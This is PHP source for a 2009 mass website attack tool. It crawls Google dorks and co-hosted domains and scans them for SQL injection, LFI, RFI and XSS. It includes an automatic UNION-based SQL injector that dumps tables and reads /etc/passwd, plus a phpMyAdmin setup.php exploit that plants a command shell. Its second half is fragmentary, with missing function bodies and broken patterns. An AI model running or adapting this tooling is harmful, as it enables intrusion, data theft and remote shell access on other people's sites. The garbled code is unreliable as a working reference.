// Hide notices globally. Logo() and Help() below append to a variable that is
// never initialised and rely on this mask to stay quiet; under PHP 8 that is a
// warning, which this mask does not cover.
error_reporting(E_ALL & ~E_NOTICE);
// Entry point: the interactive command loop defined below.
Start();
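function Start() {
    // Interactive command loop: read one command per line from STDIN and
    // dispatch it to the function of the same name.
    //
    // $list_command is the allowlist for the dynamic call `$cmd()` below; it is
    // the only check between raw input and a function call, so it must hold
    // fixed names only. Each name must exist as a function in this file
    // ('help' resolves to Help() because PHP function names are case-insensitive).
    $list_command = array('help','sql','rfi','lfi','xss','full','google','getlist','jump','exploit','wget','quit', 'pmapwn','injector','hexstring','md5string','portscan',);
    print Logo();
    Tips();
    while(1) {
        fwrite(STDOUT, "\n-CMD$: ");
        $line = fgets(STDIN);
        // fgets() returns false once STDIN is closed (EOF). The original
        // trimmed that into '' and looped forever printing "Command not found";
        // leave the loop instead so the script can terminate.
        if($line === false) {
            break;
        }
        $cmd = trim($line);
        if($cmd === 'full') {
            // 'full' is the only command that takes an argument, so the site is
            // prompted for here rather than going through the dynamic call.
            fwrite(STDOUT, "\n-SITE: ");
            $site = trim((string) fgets(STDIN));
            if(empty($site)) {
                print "[Error]Please enter site URL\n";
            } else {
                full($site);
            }
        } elseif(in_array($cmd, $list_command, true)) {
            // Strict comparison: only an exact allowlisted string reaches the call.
            $cmd();
        } else {
            echo "[Error]Command not found\n";
            Tips();
        }
    }
}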
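function Logo() {
    // Print the startup banner. Returns nothing; Start() wraps the call in
    // `print Logo()`, which only prints what is emitted here.
    //
    // $text is initialised explicitly: the original appended to an undefined
    // variable, which is a warning under PHP 8 and was only hidden by the
    // E_NOTICE suppression at the top of the file.
    $text = "|***************************************************************************************|\n";
    $text .= " Website vulnerable scanner Tools 1.0 By XShimeX\n";
    $text .= " Milw0rm Exploit Finder added by TweetyCoaster(Myanmar)\n";
    $text .= " pmaPWN! - added by d3ck4, hackingexpose.blogspot.com\n";
    $text .= " Greetz : d3ck4,XShimeX,TweetyCoaster,darkc0de,HM,TBDSec\n";
    $text .= " 19th June 2009\n";
    $text .= "|***************************************************************************************|\n";
    $text .= "\n";
    print $text;
}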
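function Help() {
    // Print the command reference. Reached from Start() via the dynamic call
    // `$cmd()` with 'help' (function names are case-insensitive in PHP).
    //
    // $text is initialised explicitly: the original appended to an undefined
    // variable, which is a warning under PHP 8 and was only hidden by the
    // E_NOTICE suppression at the top of the file.
    $text = "[sql] --------> Scan SQL Injection vulnerable\n";
    $text .= "[xss] --------> Scan XSS(cross site scripting) vulnerable\n";
    $text .= "[rfi] --------> Scan RFI(remote file include) vulnerable\n";
    $text .= "[lfi] --------> Scan LFI(local file include) vulnerable\n";
    $text .= "[pmapwn] -----> Scan phpMyAdmin code injection vulnerable\n";
    $text .= "[full] -------> Grab link from website and start all scan\n";
    $text .= "[google] -----> Grab website from google and start all scan\n";
    $text .= "[getlist] ----> Grab website from file and start all scan\n";
    $text .= "[jump] -------> Find all site hosted on same ip and start all scan\n";
    $text .= "[exploit] ----> Milw0rm Exploit Finder\n";
    $text .= "[injector] ---> Automatic SQL Injector, work for v4 and v5\n";
    $text .= "[hexstring] --> Convert string to hex (useful for sql injection)\n";
    $text .= "[md5string] --> Convert string to MD5 Hash\n";
    $text .= "[portscan] --> Check port open and close\n";
    $text .= "[wget] -------> Get file from URL\n";
    print $text;
}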
function Tips() {
    // One-line usage hint, shown at startup and after an unknown command.
    $hint = "[Tips] For help, type 'help' and to quit please type 'quit'\n";
    echo $hint;
}
function full($site) {
    // Run every scanner defined in this file against one site, in a fixed
    // order, printing a header before each.
    //
    // Each scanner is called with a second argument of 1. The scanner
    // signatures later in the file name that parameter $full, so presumably it
    // marks a call made from this mode -- its effect is not visible here.
    print "[-] Start full scanning mode.\n";
    pmapwn($site, 1);
    print "[-] Start SQL Injection Scan\n";
    sql($site, 1);
    print "[-] Start XSS Scan\n";
    xss($site, 1);
    print "[-] Start RFI Scan\n";
    rfi($site, 1);
    print "[-] Start LFI Scan\n";
    lfi($site, 1);
}
function hexstring() {
    // Prompt for a string on STDIN and echo it back together with its hex form.
    // HexValue() is defined elsewhere in this file.
    fwrite(STDOUT, "-String: ");
    $input = trim(fgets(STDIN));
    printf("[-] String: %s\n", $input);
    printf("[-] Hex: %s\n", HexValue($input));
}
function portscan() {
    // Interactive TCP connect check: reads a host and an inclusive port range
    // from STDIN and reports each port on which a connection succeeds.
    fwrite(STDOUT, "-IP/Domain: ");
    $host = trim(fgets(STDIN));
    fwrite(STDOUT, "-Start Port: ");
    $sport = trim(fgets(STDIN));
    fwrite(STDOUT, "-End Port: ");
    $eport = trim(fgets(STDIN));
    print "[-] IP/Domain : $host\n";
    // intval() turns empty or non-numeric input into 0, so a garbled end port
    // silently yields an empty range rather than an error. Nothing checks that
    // the start is <= the end or that the values are valid port numbers.
    $sport = intval($sport);
    $eport = intval($eport);
    print "[-] Checking...\n";
    for($i = $sport; $i <= $eport; $i++) {
        // '@' hides the warning fsockopen() emits on a refused or timed-out
        // connection (3 s timeout). $errno/$errstr are captured but never
        // printed, so a closed port and a DNS failure look the same.
        // NOTE(review): the handle in $check is never fclose()d, so each open
        // port leaks a socket until the script exits.
        $check = @fsockopen($host, $i, $errno, $errstr, 3);
        if($check) {
            print "[-] Port '$i' is open\n";
        }
    }
    print "[-] Done\n";
}
function md5string() {
    // Prompt for a string on STDIN and echo it back together with its MD5 digest.
    fwrite(STDOUT, "-String: ");
    $input = trim(fgets(STDIN));
    $digest = md5($input);
    printf("[-] String: %s\n", $input);
    printf("[-] MD5: %s\n", $digest);
}
function jump() {
    // Reverse-IP pivot: resolve the site read from STDIN, fetch the list of
    // domains that a third-party lookup page (ip-adress.com) reports on the same
    // IP, append them to domain_list.txt, then run full() and joomla() against
    // every one of them -- not only the site that was entered.
    fwrite(STDOUT, "-SITE: ");
    $site = trim(fgets(STDIN));
    // parse_url() returns no 'host' element when the input has no scheme (a bare
    // domain), in which case everything below runs against an empty host.
    $request = parse_url($site);
    $jump_site = "http://www.ip-adress.com/reverse_ip/$request[host]";
    // Captures the domain out of the lookup page's whois links; tied to that
    // page's markup as it was when this was written.
    $pattern = "/href=\"\/whois\/(.*?)\">Who(.*?)/";
    print "[-] URL : $request[host]\n";
    print "[-] Path: $request[path]\n";
    print "[-] Server IP: ".gethostbyname($request['host'])."\n";
    print "[-] Get list domain hosted on the ip...\n";
    // con_host() is defined elsewhere in this file; presumably it returns the
    // response body for the URL -- verify before relying on it.
    $list = con_host($jump_site);
    preg_match_all($pattern,$list, $links);
    // The total is the number of regex matches on the lookup page, not a
    // verified count of hosts.
    print "[-] Total site hosted on ".$request['host']." : ".count($links[1])."\n";
    // First pass only records the list, one entry per line. save_log() opens
    // the file in append mode, so repeated runs accumulate.
    foreach($links[1] as $link) {
        $link = "http://".$link;
        save_log('domain_list.txt',"$link\n");
    }
    print "[-] Domain list save to 'domain_list.txt'\n";
    // Second pass scans each listed domain; there is no limit on how many.
    foreach($links[1] as $link) {
        $link = "http://".$link;
        full($link);
        joomla($link);
    }
}
function google() {
fwrite(STDOUT, "-DORK: ");
$dork = trim(fgets(STDIN));
print "[-] Dork: $dork\n";
print "[-] Start google scanning...\n";
for($i = 0; $i <= 900; $i+=100) {
$fp = con_host("http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
@preg_match_all("/
/", $fp, $links);
print "[+] Total site found: $total\n";
print "[+] Done finding link on google\n";
print "[!] If you found this not working pls notify us!\n";
save_log('domain_list.txt',"http://".$real['host']."\n");
print "[-] Domain list save to 'domain_list.txt'\n";
$getfile = trim(fgets(STDIN));
$handle = fopen($getfile, "r");
if($content = con_host($site)) {
if(preg_match("/option=com_/", $content)) {
print "[-] Joomla site found: $site\n";
function lfi($site = '', $full = '0') {
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[+] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
foreach($list_lfi as $error) {
$link = preg_replace("/=(.+)/", "=$error", $link);
if(preg_match("/root:x:/", con_host($link))) {
print "[-]LFI vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[+] See 'vulnerable.log' for vulnerable list\n";
function sql($site = '', $full = '0') {
'You have an error in your SQL',
'supplied argument is not a valid MySQL result resource in',
'Microsoft JET Database','ODBC Microsoft Access Driver',
'Microsoft OLE DB Provider for SQL Server',
'Microsoft OLE DB Provider for Oracle',
'[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[-] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
$link = preg_replace("/=(.+)/", "=1'", $link);
foreach($sql_error as $error) {
if(preg_match("/$error/", con_host($link))) {
print "[+] SQL Injection vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[-] See 'vulnerable.log' for vulnerable list\n";
function rfi($site = '', $full = '0') {
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[-] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
$link = preg_replace("/=(.+)/", "=http://google.com/index.html?", $link);
if(preg_match("/Advertising Programs/", con_host($link))) {
echo "[+] RFI vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[+] See 'vulnerable.log' for vulnerable list\n";
print "[!] Connect to host failed\n";
function xss($site = '', $full = '0') {
print "[-] URL : $request[host]\n";
print "[-] Path: $request[path]\n";
print "[-] Try connect to host\n";
$url = "".$request['scheme']."://".$request['host'].$request['path']."";
print "[+] Connect to host successful\n";
print "[-] Finding link on the website\n";
print "[+] Found link : ".count(find_link($url))."\n";
print "[-] Finding vulnerable...\n";
foreach(find_link($url) as $link) {
$file = explode("/", $request['path']);
$request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
$link = preg_replace("/=(.+)/", "=
XSS_HERE
", $link);XSS_HERE/", con_host($link))) {
echo "[+] XSS vulnerable : $link\n";
save_log('vulnerable.log', "".$link."\r\n");
print "[+] See 'vulnerable.log' for vulnerable list\n";
print "[!] Connect to host failed\n";
added by tweetycoaster 17-06-2009
based on Bugs Exploit Finder V 1.0 2008 by DDOS
$url="http://www.milw0rm.com/search.php?dong=$script";
$dump=file_get_contents($url);
(.*?)#',$dump,$date);preg_match_all('#target="_blank" class="style14">(.*?)#',$dump,$exploit);
preg_match_all('#
#',$dump,$url);print "[+] Connected ! ! !\n";
for($i=0 ; $i < $lang ; $i++){
print "[+] Exploit Number : $d \n";
save_log('exploits.log', "[+]Exploit Number : $d \r\n");
print "[+] Exploit Name = ".$exploit[1][$i]."\n";
save_log('exploits.log', "[+]Exploit Name = ".$exploit[1][$i]."\r\n");
print "[+] Exploit URL = http://www.milw0rm.com".$url[1][$i]."\r\n";
save_log('exploits.log', "[+]Exploit URL = http://www.milw0rm.com".$url[1][$i]."\r\n");
print "[+] Exploit Date = ".$date[1][$i]."\n";
save_log('exploits.log', "[+]Exploit Date = ".$date[1][$i]."\r\n");
save_log('exploits.log', " ------------------------------- \r\n");
print "[+] See 'exploits.log' for details list\n";
function pmapwn($site = '', $full = '0') {
print "\n[!] pmaPWN! - phpMyAdmin Code Injection Exploit(PHP) by d3ck4\n\n";
print "[-] Site : ".$site."\n";
print "[-] Scanning phpMyAdmin, wait sec..\n";
phpmyadmin_scan_site($site.$path);
function phpmyadmin_scan_site($url) {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
if (preg_match("/200 OK/", $result) and preg_match("/phpMyAdmin/", $result)) {
print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url." ]";
print "\n[-] Scanning vulnerable, wait sec..\n";
phpmyadmin_exploit_site($url);
function phpmyadmin_exploit_site($url) {
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 1);
curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
print "\n[-] Exploiting, wait sec..\n";
print "\n[-] Shit! no luck.. not vulnerable\n";
function phpmyadmin_exploit($w00t) {
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, "expoitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
print "\n[-] Sending evil payload mwahaha.. \n";
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, "expoitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
print "\n[!] w00t! w00t! You should now have shell here";
print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
save_log('pmashell.txt', $w00t."config/config.inc.php?c=id\r\n");
print "\n[!] Shit! no luck.. not vulnerable\n";
print "See 'pmashell.txt' for the list\n";
if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
fwrite(STDOUT, "\n-URL Ending (-- or /*): ");
if(!preg_match("/darkc0de/", $url)) {
print "[-] Please insert 'darkc0de' token on the URL\n";
print "[-] Example: http://site.com/news.php?id=darkc0de\n";
print "[-] Example: http://site.com/index.php?id=darkc0de&pg=news\n";
print "[%] Trying connect to host...\n";
print "[+] Connect to host successful\n";
print "[-] Finding column number...\n";
inject_get_column_num($url, $end);
print "[!] Connect to host failed\n";
function inject_get_column_num($url, $ending) {
for($i = 0; $i <= $max; $i++) {
$word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
$sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
if(preg_match("/darkc0de:(.*?):/i", con_host($sql), $val)) {
print "[-] Found column number: ".$i."\n";
print "[-] Null Number: ".$val[1]."\n";
save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
$col = str_replace($val[1], "darkc0de", $col);
$real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
save_log('injector.txt', "[-] URL: ".$real."\r\n");
print "[-] Getting sql server information...\n";
foreach($info as $get => $val) {
print "[-] $get: $value[1]\n";
save_log('injector.txt', "[-] $get: $value[1]\r\n");
print "[-] Testing load file...\n";
$load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
if(preg_match("/root:x:/", con_host($load))) {
print "[-] w00t w00t, you have permission to load file!\n";
save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
save_log('injector.txt', "[-] URL: $load\r\n");
print "[-] No permission to load file :( \n";
print "[-] MySQL Server version is : 5.x\n";
print "[-] Start extract the column and table...\n";
if(preg_match("/r0x:(.*?):r0x/", con_host($url), $totaltbl)) {
print "[-] Total Table Found: ".$totaltbl[1]."\n";
save_log('injector.txt', "[-] Total Table Found: ".$totaltbl[1]."\r\n");
for($i = 0; $i <= $totaltbl[1]; $i++) {
print "[-] Table: ".$table_name[1]."\n";
save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
print "[-] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
save_log('injector.txt', "[-] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
for($a = 0; $a <= $totalclm[1]; $a++) {
save_log('injector.txt', "".$column_name[1].",");
save_log('injector.txt', "\r\n");
print "[-] MySQL Server version is : 4.x\n";
print "[-] Start automatic column and table finder...\n";
print "[-] This may take a few minutes or hours to finish\n";
$url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
$url = str_replace($ending, "+from+".$table."+$ending", $url);
if(preg_match("/darkc0de/", con_host($url))) {
print "[$i] Found Table : $table\n";
save_log('injector.txt', "[-] Found Table : $table\r\n");
print "[-] Finding column...\n";
foreach($column_4 as $column) {
$url = str_replace("$ending", "+from+".$table."+$ending", $url);
if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
print "[-] Found column: $column\n";
save_log('injector.txt', "[-] Found column: $column\r\n");
save_log('injector.txt', "\r\n");
print "[-] Done searching column inside $table table\n";
print "[-] See 'injector.txt' to see the log\n";
for($i = 0; $i < strlen($text); $i++) {
$foo = system('wget',$link ,$output);
print "[+] Exit the program\n";
preg_match("/Content-Type:(.+)/", $info, $type);
preg_match("/Server:(.+)/", $info, $server);
print "[-] IP: ".gethostbyname($ip['host'])."\n";
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
$find = "/href=[\"']?([^\"']+)?[\"']?/i";
preg_match_all($find, $text, $links);
function save_log($fname = '', $text = '') {
$file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
$write = @fwrite($file, $text, '60000000');